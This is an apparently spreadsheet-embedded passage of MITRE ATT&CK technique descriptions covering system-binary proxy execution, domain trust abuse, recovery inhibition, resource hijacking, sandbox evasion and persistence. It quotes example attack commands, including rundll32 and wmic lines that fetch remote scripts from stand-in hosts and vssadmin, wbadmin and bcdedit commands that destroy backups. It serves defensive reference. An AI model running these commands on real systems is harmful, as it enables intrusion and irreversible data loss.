    <x v="3"/>
    <s v="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_x000a__x000a_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Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002) can be proxied through Rundll32.exe._x000a__x000a_Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: &lt;code&gt;rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();GetObject(&quot;script:https[:]//www[.]example[.]com/malicious.sct&quot;)&quot;&lt;/code&gt;  This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)_x000a__x000a_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_x000a__x000a_Additionally, adversaries may use [Masquerading](https://attack.mitre.org/techniques/T1036) techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.(Citation: rundll32.exe defense evasion) "/>
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="Adversaries may abuse verclsid.exe to proxy execution of malicious code. Verclsid.exe is known as the Extension CLSID Verification Host and is responsible for verifying each shell extension before they are used by Windows Explorer or the Windows Shell.(Citation: WinOSBite verclsid.exe)_x000a__x000a_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
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="Adversaries may abuse mavinject.exe to proxy execution of malicious code. Mavinject.exe is the Microsoft Application Virtualization Injector, a Windows utility that can inject code into external processes as part of Microsoft Application Virtualization (App-V).(Citation: LOLBAS Mavinject)_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="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_x000a__x000a_For example, &lt;code&gt;mmc C:\Users\foo\admintools.msc /a&lt;/code&gt; will open a custom, saved console msc file in author mode.(Citation: win_mmc) Another common example is &lt;code&gt;mmc gpedit.msc&lt;/code&gt;, which will open the Group Policy Editor application window. _x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="95"/>
    <x v="3"/>
    <s v="Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1)_x000a__x000a_Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher=&quot;C:\Windows\system32\cmd.exe /c calc.exe`).(Citation: Electron 6-8)_x000a__x000a_Adversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)"/>
  </r>
  <r>
    <x v="96"/>
    <x v="0"/>
    <s v="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_x000a__x000a_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controlled system._x000a_ _x000a_Adversaries may similarly abuse response features included in EDR and other defensive tools that enable remote access._x000a__x000a_Installation of many remote access software may also include persistence (e.g., the software's installation routine creates a [Windows Service](https://attack.mitre.org/techniques/T1543/003)). Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)"/>
  </r>
  <r>
    <x v="97"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)_x000a__x000a_* &lt;code&gt;msxsl.exe customers[.]xml script[.]xsl&lt;/code&gt;_x000a_* &lt;code&gt;msxsl.exe script[.]xsl script[.]xsl&lt;/code&gt;_x000a_* &lt;code&gt;msxsl.exe script[.]jpeg script[.]jpeg&lt;/code&gt;_x000a__x000a_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quot;Squiblydoo&quot; counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) provided they utilize the /FORMAT switch.(Citation: XSL Bypass Mar 2019)_x000a__x000a_Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)_x000a__x000a_* Local File: &lt;code&gt;wmic process list /FORMAT:evil[.]xsl&lt;/code&gt;_x000a_* Remote File: &lt;code&gt;wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”&lt;/code&gt;"/>
  </r>
  <r>
    <x v="98"/>
    <x v="3"/>
    <s v="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_x000a__x000a_Properties within parts may reference shared public resources accessed via online URLs. For example, template properties may reference a file, serving as a pre-formatted document blueprint, that is fetched when the document is loaded._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="99"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="99"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="99"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="100"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)"/>
  </r>
  <r>
    <x v="100"/>
    <x v="3"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="100"/>
    <x v="3"/>
    <s v="Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)_x000a__x000a_While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)_x000a__x000a_In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)_x000a__x000a_Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)"/>
  </r>
  <r>
    <x v="101"/>
    <x v="4"/>
    <s v="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
  </r>
  <r>
    <x v="102"/>
    <x v="11"/>
    <s v="Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation._x000a__x000a_Modifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants._x000a__x000a_With sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include:  _x000a__x000a_* modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)_x000a_* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to  forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)_x000a_* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207)._x000a_* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023)_x000a__x000a_Adversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators."/>
  </r>
  <r>
    <x v="102"/>
    <x v="11"/>
    <s v="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_x000a__x000a_Like other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain._x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="102"/>
    <x v="11"/>
    <s v="Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains._x000a__x000a_Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) _x000a__x000a_An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"/>
  </r>
  <r>
    <x v="103"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_In cloud environments, adversaries may leverage access to delete cloud storage objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)"/>
  </r>
  <r>
    <x v="103"/>
    <x v="22"/>
    <s v="Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.  _x000a__x000a_Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once. _x000a__x000a_For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs)"/>
  </r>
  <r>
    <x v="104"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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quot;print bombing&quot;).(Citation: NHS Digital Egregor Nov 2020)_x000a__x000a_In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)"/>
  </r>
  <r>
    <x v="105"/>
    <x v="22"/>
    <s v="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_x000a__x000a_Adversaries may accomplish this by disabling individual services of high importance to an organization, such as &lt;code&gt;MSExchangeIS&lt;/code&gt;, which will make Exchange content inaccessible.(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
  </r>
  <r>
    <x v="106"/>
    <x v="22"/>
    <s v="Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options._x000a__x000a_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_x000a__x000a_A number of native Windows utilities have been used by adversaries to disable or delete system recovery features:_x000a__x000a_* &lt;code&gt;vssadmin.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;vssadmin.exe delete shadows /all /quiet&lt;/code&gt;_x000a_* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - &lt;code&gt;wmic shadowcopy delete&lt;/code&gt;_x000a_* &lt;code&gt;wbadmin.exe&lt;/code&gt; can be used to delete the Windows Backup Catalog - &lt;code&gt;wbadmin.exe delete catalog -quiet&lt;/code&gt;_x000a_* &lt;code&gt;bcdedit.exe&lt;/code&gt; can be used to disable automatic Windows recovery features by modifying boot configuration data - &lt;code&gt;bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures &amp; bcdedit /set {default} recoveryenabled no&lt;/code&gt;_x000a_* &lt;code&gt;REAgentC.exe&lt;/code&gt; can be used to disable Windows Recovery Environment (WinRE) repair/recovery options of an infected system_x000a_* &lt;code&gt;diskshadow.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;diskshadow delete shadows all&lt;/code&gt; (Citation: Diskshadow) (Citation: Crytox Ransomware)_x000a__x000a_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_x000a__x000a_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database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)"/>
  </r>
  <r>
    <x v="107"/>
    <x v="22"/>
    <s v="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_x000a_"/>
  </r>
  <r>
    <x v="107"/>
    <x v="22"/>
    <s v="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
  </r>
  <r>
    <x v="107"/>
    <x v="22"/>
    <s v="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
  </r>
  <r>
    <x v="108"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="109"/>
    <x v="22"/>
    <s v="Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. _x000a__x000a_Resource hijacking may take a number of different forms. For example, adversaries may:_x000a__x000a_* Leverage compute resources in order to mine cryptocurrency_x000a_* Sell network bandwidth to proxy networks_x000a_* Generate SMS traffic for profit_x000a_* Abuse cloud-based messaging services to send large quantities of spam messages_x000a__x000a_In some cases, adversaries may leverage multiple types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking 2023)"/>
  </r>
  <r>
    <x v="109"/>
    <x v="22"/>
    <s v="Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. _x000a__x000a_One common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)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Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)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_x000a__x000a_Additionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)"/>
  </r>
  <r>
    <x v="109"/>
    <x v="22"/>
    <s v="Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. _x000a__x000a_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 Finally, they may engage in internet-wide scanning in order to identify additional targets for compromise.(Citation: Unit 42 Leaked Environment Variables 2024)_x000a__x000a_In addition to incurring potential financial costs or availability disruptions, this technique may cause reputational damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig Proxyjacking)"/>
  </r>
  <r>
    <x v="109"/>
    <x v="22"/>
    <s v="Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)_x000a__x000a_Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)"/>
  </r>
  <r>
    <x v="109"/>
    <x v="22"/>
    <s v="Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability. _x000a__x000a_For example, adversaries may leverage email and messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid, and Twilio, in order to send large quantities of spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking 2024)_x000a__x000a_In some cases, adversaries may leverage services that the victim is already using. In others, particularly when the service is part of a larger cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking 2024) Leveraging SaaS applications may cause the victim to incur significant financial costs, use up service quotas, and otherwise impact availability. "/>
  </r>
  <r>
    <x v="110"/>
    <x v="23"/>
    <s v="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_x000a__x000a_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_x000a__x000a_"/>
  </r>
  <r>
    <x v="110"/>
    <x v="23"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`._x000a__x000a_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_x000a_ _x000a_Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.(Citation: Unit 42 OilRig Sept 2018)"/>
  </r>
  <r>
    <x v="110"/>
    <x v="23"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="110"/>
    <x v="23"/>
    <s v="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_x000a__x000a_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Citation: Deloitte Environment Awareness)_x000a__x000a_Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)_x000a__x000a_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
  </r>
  <r>
    <x v="111"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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_x000a__x000a_To perform Network DoS attacks several aspects apply to multiple methods, including IP address spoofing, and botnets._x000a__x000a_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_x000a__x000a_For DoS attacks targeting the hosting system directly, see [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499)."/>
  </r>
  <r>
    <x v="111"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="111"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="112"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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_x000a__x000a_To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_For attacks attempting to saturate the providing network, see [Network Denial of Service](https://attack.mitre.org/techniques/T1498)._x000a_"/>
  </r>
  <r>
    <x v="112"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="112"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="112"/>
    <x v="22"/>
    <s v="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
  </r>
  <r>
    <x v="112"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="113"/>
    <x v="18"/>
    <s v="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
  </r>
  <r>
    <x v="113"/>
    <x v="18"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="113"/>
    <x v="18"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="113"/>
    <x v="18"/>
    <s v="Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)_x000a__x000a_In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)"/>
  </r>
  <r>
    <x v="113"/>
    <x v="18"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="113"/>
    <x v="18"/>
    <s v="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_x000a__x000a_[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a &quot;generic&quot;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_x000a__x000a_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
  </r>
  <r>
    <x v="114"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Such software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally._x000a__x000a_Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)."/>
  </r>
  <r>
    <x v="114"/>
    <x v="4"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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r>
  <r>
    <x v="115"/>
    <x v="18"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="116"/>
    <x v="4"/>
    <s v="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Entra ID, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs._x000a__x000a_Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Microsoft Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="117"/>
    <x v="1"/>
    <s v="Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources._x000a__x000a_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Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment._x000a__x000a_For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)  Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges._x000a__x000a_Token theft can also occur through social engineering, in which case user action may be required to grant access.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_x000a_ _x000a_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_x000a__x000a_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_x000a__x000a_"/>
  </r>
  <r>
    <x v="118"/>
    <x v="22"/>
    <s v="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_x000a__x000a_Shutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery._x000a__x000a_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
  </r>
  <r>
    <x v="119"/>
    <x v="2"/>
    <s v="Adversaries may access data from cloud storage._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects."/>
  </r>
  <r>
    <x v="120"/>
    <x v="22"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
  </r>
  <r>
    <x v="121"/>
    <x v="6"/>
    <s v="After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)_x000a__x000a_For example,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login interfaces._x000a__x000a_Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)"/>
  </r>
  <r>
    <x v="122"/>
    <x v="3"/>
    <s v="Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure._x000a__x000a_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_x000a__x000a_A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity._x000a__x000a_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
  </r>
  <r>
    <x v="123"/>
    <x v="5"/>
    <s v="Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service._x000a__x000a_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Citation: TLDRSec AWS Attacks)_x000a__x000a_Adversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access Signature)_x000a__x000a_Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) "/>
  </r>
  <r>
    <x v="124"/>
    <x v="4"/>
    <s v="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_x000a__x000a_Depending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests."/>
  </r>
  <r>
    <x v="125"/>
    <x v="1"/>
    <s v="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_x000a__x000a_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_x000a__x000a_There are several examples of malware targeting cookies from web browsers on the local system.(Citation: Kaspersky TajMahal April 2019)(Citation: Unit 42 Mac Crypto Cookies January 2019) Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)_x000a__x000a_There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g., [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)) that can be set up by an adversary and used in phishing campaigns.(Citation: Github evilginx2)(Citation: GitHub Mauraena)_x000a__x000a_After an adversary acquires a valid cookie, they can then perform a [Web Session Cookie](https://attack.mitre.org/techniques/T1550/004) technique to login to the corresponding web application."/>
  </r>
  <r>
    <x v="126"/>
    <x v="20"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="126"/>
    <x v="20"/>
    <s v="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Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: About UEFI)_x000a__x000a_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
  </r>
  <r>
    <x v="126"/>
    <x v="20"/>
    <s v="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_x000a__x000a_Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks."/>
  </r>
  <r>
    <x v="126"/>
    <x v="20"/>
    <s v="Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly._x000a__x000a_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_x000a__x000a_The MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code."/>
  </r>
  <r>
    <x v="126"/>
    <x v="20"/>
    <s v="Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)_x000a__x000a__x000a_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
  </r>
  <r>
    <x v="126"/>
    <x v="20"/>
    <s v="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_x000a__x000a_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
  </r>
  <r>
    <x v="127"/>
    <x v="7"/>
    <s v="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_x000a__x000a_Adversaries may install new services, daemons, or agents that can be configured to execute at startup or a repeatable interval in order to establish persistence. Similarly, adversaries may modify existing services, daemons, or agents to achieve the same effect.  _x000a__x000a_Services, daemons, or agents may be created with administrator privileges but executed under root/SYSTEM privileges. Adversaries may leverage this functionality to create or modify system processes in order to escalate privileges.(Citation: OSX Malware Detection)  "/>
  </r>
  <r>
    <x v="127"/>
    <x v="7"/>
    <s v="Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;~/Library/LaunchAgents&lt;/code&gt;.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the &lt;code&gt;Label&lt;/code&gt;, &lt;code&gt;ProgramArguments &lt;/code&gt;, and &lt;code&gt;RunAtLoad&lt;/code&gt; keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks._x000a__x000a_ Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command._x000a_ _x000a_Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the &lt;code&gt;RunAtLoad&lt;/code&gt; or &lt;code&gt;KeepAlive&lt;/code&gt; keys set to &lt;code&gt;true&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) "/>
  </r>
  <r>
    <x v="127"/>
    <x v="7"/>
